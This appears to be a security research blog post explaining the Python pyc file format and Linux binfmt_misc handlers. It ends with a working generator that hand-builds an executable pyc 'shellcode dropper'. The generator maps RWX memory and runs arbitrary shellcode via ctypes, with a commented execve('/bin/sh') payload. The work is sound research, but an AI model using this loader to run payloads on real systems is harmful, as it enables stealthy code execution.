Python pyc files are a binary format that speeds up imports by caching the compiled
form of imported files. They contain a small header, metadata about the code
object, and the bytecode itself.
There are a lot of resources for Python 2.7, but Python 2.x has been deprecated and
there aren't many resources for Python 3, specifically Python 3.7+. Most of the
differences between Python versions come from newer opcodes which aren't
supported in older versions. There are also file format extensions, changes, and
newer features.
[: Quick Rundown on the CPython VM :]
CPython is the reference implementation of Python, and its VM is what runs your
code. When you run a Python program, the interpreter compiles your code into a code
object that tells the Python VM what to do. I won't get into all the details
because there are some really good resources that deep dive into how everything
works.
- https://tenthousandmeters.com/blog/python-behind-the-scenes-1-how-the-cpython-vm-works/
- https://nowave.it/python-bytecode-analysis-1.html
- https://github.com/rocky/python-decompile3
The main thing we care about is that .pyc files hold these code objects in
serialized form, and Python can run them as standalone files.
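To make that concrete, here is a minimal sketch that compiles a one-line script,
splits the resulting pyc into its header and code object, and runs the code object.
It assumes the Python 3.7+ 16-byte header layout. The names read_pyc and demo are
made up for this example.

```python
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile
import types


def read_pyc(path):
    """Split a Python 3.7+ .pyc into its header fields and code object."""
    with open(path, "rb") as f:
        data = f.read()
    magic = data[0:4]
    # Three little-endian 32-bit fields follow the magic. For timestamp-based
    # pycs (flags == 0) they are: flags, source mtime, source size.
    flags, mtime, source_size = struct.unpack("<III", data[4:16])
    # Everything after the 16-byte header is a marshalled code object.
    code = marshal.loads(data[16:])
    return magic, flags, mtime, source_size, code


def demo():
    """Compile a tiny script in a temp directory and parse the result."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "hehe.py")
        with open(src, "wb") as f:
            f.write(b'print("hehe")\n')
        pyc = py_compile.compile(
            src,
            cfile=os.path.join(tmp, "hehe.pyc"),
            doraise=True,
            # Force the timestamp layout so the header fields mean what we expect.
            invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
        )
        return read_pyc(pyc)


if __name__ == "__main__":
    magic, flags, mtime, source_size, code = demo()
    print("magic matches this interpreter:", magic == importlib.util.MAGIC_NUMBER)
    print("is a code object:", isinstance(code, types.CodeType))
    exec(code)  # runs the compiled print("hehe")
```

marshal.loads only understands code objects written by the same Python version, so
this is meant for pyc files produced by the interpreter you are running.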
Test it yourself!
$ cat hehe.py
print("hehe")
$ cat ok.py
import hehe
print("ok")
$ python3 ok.py
hehe
ok
In the directory you ran this script from, a directory called __pycache__ has been
created. It contains a file called hehe.cpython-39.pyc. I am using python3.9
here, so the file name reflects that.
You can then run this program directly using Python3.
$ python3 __pycache__/hehe.cpython-39.pyc
hehe
But did you know that you can run this without calling python3 from the cli?
$ chmod +x __pycache__/hehe.cpython-39.pyc
$ __pycache__/hehe.cpython-39.pyc
hehe
[: Binary Format Handlers :]
Linux has a way of registering binary format handlers for different programs.
Typically you use ELF binaries or bash scripts to run programs on Linux, but there
are cases where a binary file format might enjoy some support without having to
call its interpreter directly. In the case of scripts, you can use a shebang (#!)
with the path to the interpreter to tell the kernel what to run the script with.
Binary formats don't usually have room for something like this, so something else
must tell the kernel what to do. The way this is handled is through binfmt_misc.
This is a part of the kernel which allows users to register binary format handlers
for arbitrary formats.
- https://en.wikipedia.org/wiki/Binfmt_misc
- https://elixir.bootlin.com/linux/v5.19/source/fs/binfmt_misc.c
You can see which binfmts are registered using the binfmt-support package.
$ sudo apt install binfmt-support
$ /sbin/update-binfmts --display
jar (enabled):
package = openjdk-11
type = magic
offset = 0
magic = PK\x03\x04
mask =
interpreter = /usr/bin/jexec
detector =
python3.9 (enabled):
package = python3.9
type = magic
offset = 0
magic = \x61\x0d\x0d\x0a
mask =
interpreter = /usr/bin/python3.9
detector =
We can see that Python3.9 is registered with the magic value "\x61\x0d\x0d\x0a".
This can be confirmed using xxd on the pyc file. The first four bytes match the
registered magic value.
$ xxd __pycache__/hehe.cpython-39.pyc | head -n1
00000000: 610d 0d0a 0000 0000 b7d7 f262 0f00 0000 a..........b....
On this distribution, the handler is registered by default when python3 is installed.
For more info on how to register binary formats, check out the kernel docs.
https://docs.kernel.org/admin-guide/binfmt-misc.html
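As a rough illustration of what a registration looks like, the sketch below builds
the rule string described in the kernel docs
(:name:type:offset:magic:mask:interpreter:flags) for a magic-number match. The
helper name binfmt_rule is made up here, and the handler name and interpreter path
are just the values from the update-binfmts output above.

```python
def binfmt_rule(name, magic, interpreter, offset=0, flags=""):
    """Build a binfmt_misc rule string that matches on magic bytes."""
    # Type 'M' selects magic-number matching. Every byte is written as \xNN so
    # that bytes like 0x0a or ':' cannot break the rule syntax.
    escaped = "".join(f"\\x{b:02x}" for b in magic)
    # The mask field is left empty, which means "compare all magic bytes".
    return f":{name}:M:{offset}:{escaped}::{interpreter}:{flags}"


if __name__ == "__main__":
    rule = binfmt_rule("python3.9", b"\x61\x0d\x0d\x0a", "/usr/bin/python3.9")
    print(rule)
```

Registering a rule means writing that string to /proc/sys/fs/binfmt_misc/register
as root. The sketch only builds the string and does not touch the system.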
You can also do some weirdness to do something like automagically run assembly
as a script. See here: https://twitter.com/iximeow/status/1487578872363192322
[: Making a shellcode dropper :]
Since we can run pyc files that match the version of the Python interpreter on the
machine, we can use this to make a cross-platform shellcode dropper using pyc.
Since the bytecode is generally the same in Python 3.7+, all that needs to change
is the shellcode injected into the pyc file.
Here's an example script that executes shellcode from Python:
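import ctypes
import mmap
s = b"\xb0\x3c\x66\xbf\x75\x00\x0f\x05" # x86-64 Linux: exits with status 0x75
m = mmap.mmap(-1, 0x1000, 0x22, 0x7,) # Linux values: flags=MAP_PRIVATE|MAP_ANONYMOUS, prot=RWX
m.write(s)
# Read the mapping's data pointer out of the mmap object (offset 16 on 64-bit CPython)
a = int.from_bytes(ctypes.string_at(id(m) + 16, 8), "little")
t = ctypes.CFUNCTYPE(ctypes.c_void_p) # Function type: no arguments, returns void*
t(a)() # Treat the address as a function and call it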
Now to turn this into a pyc file, you can just import this file from another
script, or you can use the py_compile module.
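A minimal py_compile sketch could look like the following. The helper name
build_pyc and the file names are placeholders for this example. It compiles a
harmless one-liner rather than the shellcode script.

```python
import importlib.util
import os
import py_compile
import tempfile


def build_pyc(source_path, pyc_path=None):
    """Compile source_path to a pyc and return the path that was written."""
    if pyc_path is None:
        # Same location the import system would use, e.g.
        # __pycache__/<name>.cpython-39.pyc on Python 3.9.
        pyc_path = importlib.util.cache_from_source(source_path)
    # doraise=True turns compile errors into exceptions instead of stderr noise.
    return py_compile.compile(source_path, cfile=pyc_path, doraise=True)


def demo():
    """Compile a throwaway script and return the first four bytes of the pyc."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "example.py")
        with open(src, "w") as f:
            f.write('print("ok")\n')
        out = build_pyc(src, os.path.join(tmp, "example.pyc"))
        with open(out, "rb") as f:
            return f.read(4)


if __name__ == "__main__":
    print(demo() == importlib.util.MAGIC_NUMBER)
```

The pyc produced this way carries the magic number of whichever interpreter ran
py_compile, so build it with the same Python version as the target.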
To make this dynamic, we can turn this .pyc file into a template for a script to
generate our own pyc files. Without going into all the gory details of the pyc
file format (which changes frequently -_-), we can leverage some tools such as
decompyle3 to tell us what the code looks like. This is all in the comments of
the following script, but with some of the other structures listed as well.
This should provide a good amount to play with if you're interested in the file
structure of pyc files. If you have any questions feel free to hit me up on
twitter, @netspooky.
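One thing that helps when reading the raw bytes in the script below is knowing that
each marshalled object starts with a one-byte type tag, and that the high bit
(0x80) marks the object as something a later reference can point back to. Here is a
small sketch that decodes the tags that show up in this file. The table only covers
those tags, and describe_tag is a made-up helper name.

```python
import marshal

FLAG_REF = 0x80  # high bit of a tag: remember this object for later TYPE_REF use

# Only the tags that appear in the dropper template, not the full marshal set.
TYPE_NAMES = {
    "c": "TYPE_CODE",
    "i": "TYPE_INT",
    "N": "TYPE_NONE",
    "s": "TYPE_STRING",
    ")": "TYPE_SMALL_TUPLE",
    "z": "TYPE_SHORT_ASCII",
    "Z": "TYPE_SHORT_ASCII_INTERNED",
    "r": "TYPE_REF",
}


def describe_tag(byte):
    """Return (type name, has_ref_flag) for a marshal tag byte."""
    kind = chr(byte & 0x7F)  # strip FLAG_REF to get the type character
    return TYPE_NAMES.get(kind, "unknown"), bool(byte & FLAG_REF)


if __name__ == "__main__":
    for b in (0xE3, 0xE9, 0x4E, 0x73, 0x29, 0xDA, 0x5A, 0xFA, 0xA9, 0x72):
        print(hex(b), describe_tag(b))
    # Sanity check against the real module: marshal version 2 never sets FLAG_REF.
    print(describe_tag(marshal.dumps(b"hi", 2)[0]))
```

For example, 0xe3 is 'c' (a code object) with the reference flag set, and 0x72 is
'r', a back-reference followed by a 4-byte index into the list of flagged objects.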
POC Video for multi-stage dropper here: https://www.tiktok.com/t/ZTRU3mLt2/?k=1
---BEGIN CODE---
import struct
import sys
# Python3.7+ shellcode dropper
# - This is written with python3.7 + opcodes
# - Because it's a file format for the python3 vm, you can swap the architecture
# of the shellcode without needing to change the dropped pyc file
# Usage:
# $ printf "\xb0\x3c\x66\xbf\x75\x00\x0f\x05" | python3 drop.py
outfile = "yup.bin"
#shc = b"\x31\xC0\x48\xBB\xD1\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7\xDB\x53\x54\x5F\x99\x52\x57\x54\x5E\xB0\x3B\x0F\x05" # execve("/bin/sh")
#shc = b"\xb0\x3c\x66\xbf\x75\x00\x0f\x05" # Return 0x75
shc = sys.stdin.buffer.read() # Read shellcode bytes from stdin
def writeBin(b):
    # Write the assembled pyc bytes to outfile
    with open(outfile,'wb') as f:
        f.write(b)
shc_len = len(shc)
shc_len_b = struct.pack("<I",shc_len) # marshal lengths are little-endian 32-bit
module_len = 0x00 # Source size field; doesn't seem to be checked when the pyc is run directly
total_len = struct.pack("<I",module_len + shc_len)
pyc_bin = b""
pyc_bin += b"\x61\x0d" # Version magic - here using python 3.9 - https://github.com/google/pytype/blob/main/pytype/pyc/magic.py
pyc_bin += b"\x0d\x0a" # Magic continued
pyc_bin += b"\x00\x00\x00\x00" # Flags bit field (PEP 552); 0 = timestamp-based pyc
pyc_bin += b"\x62\x6f\x6f\x21" # Timestamp (source mtime), here ASCII "boo!"
pyc_bin += total_len # Source size field, module_len + shc_len. Little endian
pyc_bin += b"\xe3" # TYPE_CODE ('c' = 0x63) with FLAG_REF (0x80) set
pyc_bin += b"\x00\x00\x00\x00" # co_argcount
pyc_bin += b"\x00\x00\x00\x00" # co_posonlyargcount (field added in Python 3.8)
pyc_bin += b"\x00\x00\x00\x00" # co_kwonlyargcount
pyc_bin += b"\x00\x00\x00\x00" # co_nlocals
pyc_bin += b"\x06\x00\x00\x00" # co_stacksize
pyc_bin += b"\x40\x00\x00\x00" # co_flags
pyc_bin += b"\x73" # TYPE_STRING tag that starts co_code
pyc_bin += b"\x64\x00\x00\x00" # Bytecode length (100 bytes)
######################## Disassembly ########################################### import ctypes
pyc_bin += b"\x64\x00" # 1 0 LOAD_CONST 0 (0)
pyc_bin += b"\x64\x01" # 2 LOAD_CONST 1 (None)
pyc_bin += b"\x6c\x00" # 4 IMPORT_NAME 0 (ctypes)
pyc_bin += b"\x5a\x00" # 6 STORE_NAME 0 (ctypes)
################################################################################ import mmap
pyc_bin += b"\x64\x00" # 2 8 LOAD_CONST 0 (0)
pyc_bin += b"\x64\x01" # 10 LOAD_CONST 1 (None)
pyc_bin += b"\x6c\x01" # 12 IMPORT_NAME 1 (mmap)
pyc_bin += b"\x5a\x01" # 14 STORE_NAME 1 (mmap)
################################################################################ s = b"our shellcode"
pyc_bin += b"\x64\x02" # 4 16 LOAD_CONST 2 (b'shellcode')
pyc_bin += b"\x5a\x02" # 18 STORE_NAME 2 (s)
################################################################################ m = mmap.mmap(-1, 0x1000, 0x22, 0x7,)
pyc_bin += b"\x65\x01" # 5 20 LOAD_NAME 1 (mmap)
pyc_bin += b"\xa0\x01" # 22 LOAD_METHOD 1 (mmap)
pyc_bin += b"\x64\x03" # 24 LOAD_CONST 3 (-1)
pyc_bin += b"\x64\x04" # 26 LOAD_CONST 4 (4096)
pyc_bin += b"\x64\x05" # 28 LOAD_CONST 5 (34)
pyc_bin += b"\x64\x06" # 30 LOAD_CONST 6 (7)
pyc_bin += b"\xa1\x04" # 32 CALL_METHOD 4
pyc_bin += b"\x5a\x03" # 34 STORE_NAME 3 (m)
################################################################################ m.write(s)
pyc_bin += b"\x65\x03" # 6 36 LOAD_NAME 3 (m)
pyc_bin += b"\xa0\x04" # 38 LOAD_METHOD 4 (write)
pyc_bin += b"\x65\x02" # 40 LOAD_NAME 2 (s)
pyc_bin += b"\xa1\x01" # 42 CALL_METHOD 1
pyc_bin += b"\x01\x00" # 44 POP_TOP
################################################################################ a = int.from_bytes(ctypes.string_at(id(m)+16,8),"little")
pyc_bin += b"\x65\x05" # 7 46 LOAD_NAME 5 (int)
pyc_bin += b"\xa0\x06" # 48 LOAD_METHOD 6 (from_bytes)
pyc_bin += b"\x65\x00" # 50 LOAD_NAME 0 (ctypes)
pyc_bin += b"\xa0\x07" # 52 LOAD_METHOD 7 (string_at)
pyc_bin += b"\x65\x08" # 54 LOAD_NAME 8 (id)
pyc_bin += b"\x65\x03" # 56 LOAD_NAME 3 (m)
pyc_bin += b"\x83\x01" # 58 CALL_FUNCTION 1
pyc_bin += b"\x64\x07" # 60 LOAD_CONST 7 (16)
pyc_bin += b"\x17\x00" # 62 BINARY_ADD
pyc_bin += b"\x64\x08" # 64 LOAD_CONST 8 (8)
pyc_bin += b"\xa1\x02" # 66 CALL_METHOD 2
pyc_bin += b"\x64\x09" # 68 LOAD_CONST 9 ('little')
pyc_bin += b"\xa1\x02" # 70 CALL_METHOD 2
pyc_bin += b"\x5a\x09" # 72 STORE_NAME 9 (a)
################################################################################ t = ctypes.CFUNCTYPE(ctypes.c_void_p)
pyc_bin += b"\x65\x00" # 8 74 LOAD_NAME 0 (ctypes)
pyc_bin += b"\xa0\x0a" # 76 LOAD_METHOD 10 (CFUNCTYPE)
pyc_bin += b"\x65\x00" # 78 LOAD_NAME 0 (ctypes)
pyc_bin += b"\x6a\x0b" # 80 LOAD_ATTR 11 (c_void_p)
pyc_bin += b"\xa1\x01" # 82 CALL_METHOD 1
pyc_bin += b"\x5a\x0c" # 84 STORE_NAME 12 (t)
################################################################################ t(a)()
pyc_bin += b"\x65\x0c" # 9 86 LOAD_NAME 12 (t)
pyc_bin += b"\x65\x09" # 88 LOAD_NAME 9 (a)
pyc_bin += b"\x83\x01" # 90 CALL_FUNCTION 1
pyc_bin += b"\x83\x00" # 92 CALL_FUNCTION 0
pyc_bin += b"\x01\x00" # 94 POP_TOP
pyc_bin += b"\x64\x01" # 96 LOAD_CONST 1 (None)
pyc_bin += b"\x53\x00" # 98 RETURN_VALUE
################################################################################
pyc_bin += b"\x29\x0a" # co_consts - List of the constants in this program
pyc_bin += b"\xe9\x00\x00\x00\x00" # 0
pyc_bin += b"\x4e\x73" # None, then the TYPE_STRING tag (0x73) that starts the shellcode bytes
pyc_bin += shc_len_b # Shellcode length, little endian.
pyc_bin += shc # Shellcode
pyc_bin += b"\xe9\xff\xff\xff\xff" # -1
pyc_bin += b"\x69\x00\x10\x00\x00" # 4096
pyc_bin += b"\xe9\x22\x00\x00\x00" # 34
pyc_bin += b"\xe9\x07\x00\x00\x00" # 7
pyc_bin += b"\xe9\x10\x00\x00\x00" # 16
pyc_bin += b"\xe9\x08\x00\x00\x00" # 8
pyc_bin += b"\xda\x06" + b"little"
pyc_bin += b"\x29\x0d" # co_names - List of defined names, like a strtab
pyc_bin += b"\x5a\x06" + b"ctypes"
pyc_bin += b"\x5a\x04" + b"mmap"
pyc_bin += b"\xda\x01" + b"s" # The name of the shellcode variable
pyc_bin += b"\xda\x01" + b"m" # Memory area
pyc_bin += b"\xda\x05" + b"write"
pyc_bin += b"\xda\x03" + b"int"
pyc_bin += b"\xda\x0a" + b"from_bytes"
pyc_bin += b"\x5a\x09" + b"string_at"
pyc_bin += b"\xda\x02" + b"id"
pyc_bin += b"\xda\x01" + b"a" # Converted shellcode buffer
pyc_bin += b"\x5a\x09" + b"CFUNCTYPE"
pyc_bin += b"\x5a\x08" + b"c_void_p"
pyc_bin += b"\xda\x01" + b"t"
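pyc_bin += b"\xa9\x00" # co_varnames - empty tuple with FLAG_REF set
pyc_bin += b"\x72\x10\x00\x00\x00" # co_freevars - TYPE_REF back to the empty tuple (ref index 0x10)
pyc_bin += b"\x72\x10\x00\x00\x00" # co_cellvars - same TYPE_REF
pyc_bin += b"\xfa\x0b" + b"spookin'usa" # co_filename - file name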
pyc_bin += b"\xda\x08" + b"<module>" # co_name - name
pyc_bin += b"\x01\x00\x00\x00" # first line number
pyc_bin += b"\x73\x0e\x00\x00\x00" # co_lnotab tag + size (0x0e)
pyc_bin += b"\x08\x01\x08\x02\x04\x01\x10\x01\x0a\x01\x1c\x01\x0c\x01" # co_lnotab
print(f"Dropping {outfile} - Shellcode Size: {shc_len}")
writeBin(pyc_bin)
---END CODE---
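The co_lnotab bytes at the end of the template are pairs of (bytecode offset
increment, line increment). As a small sketch, assuming the pre-3.10 lnotab
encoding used by this Python 3.9 template, they can be decoded like this. The
function name decode_lnotab is made up for the example.

```python
def decode_lnotab(lnotab, first_line=1):
    """Decode a pre-3.10 co_lnotab into (bytecode offset, line number) pairs."""
    pairs = []
    addr, line, last_line = 0, first_line, None
    for i in range(0, len(lnotab) - 1, 2):
        addr_incr, line_incr = lnotab[i], lnotab[i + 1]
        if addr_incr:
            # A new bytecode range starts: record where the current line began.
            if line != last_line:
                pairs.append((addr, line))
                last_line = line
            addr += addr_incr
        if line_incr >= 0x80:
            line_incr -= 0x100  # line increments are signed bytes
        line += line_incr
    if line != last_line:
        pairs.append((addr, line))
    return pairs


if __name__ == "__main__":
    # The co_lnotab bytes from the dropper template.
    table = b"\x08\x01\x08\x02\x04\x01\x10\x01\x0a\x01\x1c\x01\x0c\x01"
    for offset, line in decode_lnotab(table):
        print(f"line {line} starts at bytecode offset {offset}")
```

The decoded offsets (0, 8, 16, 20, 36, 46, 74, 86) line up with the first
instruction of each source line in the disassembly comments.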